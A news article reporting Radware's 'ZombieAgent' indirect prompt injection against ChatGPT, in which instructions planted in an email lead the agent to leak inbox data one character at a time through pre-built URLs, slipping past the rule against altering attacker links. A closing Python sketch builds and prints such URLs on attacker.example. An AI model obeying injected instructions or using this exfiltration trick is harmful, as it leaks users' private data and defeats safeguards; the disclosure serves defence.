Artificial Intelligence
Radware bypassed ChatGPT’s protections to exfiltrate user data and implant persistent logic in the agent’s long-term memory.
January 9, 2026 (7:41 AM ET)

ChatGPT vulnerabilities could be exploited to exfiltrate user data and modify the agent’s long-term memory for persistence, web security firm Radware reports.
Widely adopted across enterprises worldwide, ChatGPT has broad access to connected applications such as Gmail, GitHub, Jira, and Teams, and by default stores user conversations and sensitive information.
It also includes built-in functionality to browse the web, analyze files, and more, making it convenient and powerful, but also expanding the risks associated with its malicious use.
On Thursday, Radware disclosed a new indirect prompt injection technique that exploits ChatGPT vulnerabilities to exfiltrate user data and turn the AI agent into a persistent spy tool for attackers.
Called ZombieAgent, the attack relies on malicious emails and files to bypass OpenAI’s protections and exfiltrate data from the victim’s inbox and email address book, without user interaction.
In the first scenario detailed by Radware, the attacker exfiltrates sensitive user data via OpenAI’s private servers by sending an email containing malicious instructions for ChatGPT.
When the user asks the AI agent to perform a Gmail action, it reads the instructions in the attacker’s email and exfiltrates the data “before the user ever sees the content”, Radware says.
The email contains a list of pre-constructed URLs, one for each letter and digit, plus a special token for spaces, and instructs ChatGPT to search for sensitive information, normalize it, and exfiltrate it character by character using the provided URLs.
To prevent data leakage, ChatGPT is not allowed to modify attacker-provided URLs, for example by appending stolen data as parameters, but Radware’s attack renders this protection ineffective because the agent never modifies the pre-provided URLs; it only chooses which of them to request.
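To illustrate the mechanism, the sketch below shows how character-by-character exfiltration through a fixed set of URLs could work in principle. This is not Radware’s actual payload: the domain, path scheme, and space token are hypothetical assumptions, and the sketch only prints the URLs the agent would be tricked into fetching.

```python
# Illustrative sketch only, not Radware's actual payload.
# The domain "attacker.example" and the "sp" space token are hypothetical.
import string

ALPHABET = string.ascii_lowercase + string.digits
SPACE_TOKEN = "sp"  # hypothetical special token representing a space

# The malicious email would embed one static, pre-built URL per character:
URL_MAP = {ch: f"https://attacker.example/leak/{ch}" for ch in ALPHABET}
URL_MAP[" "] = f"https://attacker.example/leak/{SPACE_TOKEN}"

def normalize(text: str) -> str:
    """Lowercase the text and drop any character without a pre-built URL."""
    return "".join(ch for ch in text.lower() if ch in URL_MAP)

def urls_to_request(secret: str) -> list[str]:
    """Return the sequence of unmodified, pre-built URLs whose request
    order spells out the secret. No URL is ever edited, so a rule that
    only blocks modifying attacker links would not trigger."""
    return [URL_MAP[ch] for ch in normalize(secret)]

# Example: "leaking" a short string one character at a time.
for url in urls_to_request("Acme 2026"):
    print(url)
```

Because each request targets a URL that already appeared verbatim in the email, the exfiltrated data lives entirely in which URLs are fetched and in what order, rather than in any URL the agent constructs itself.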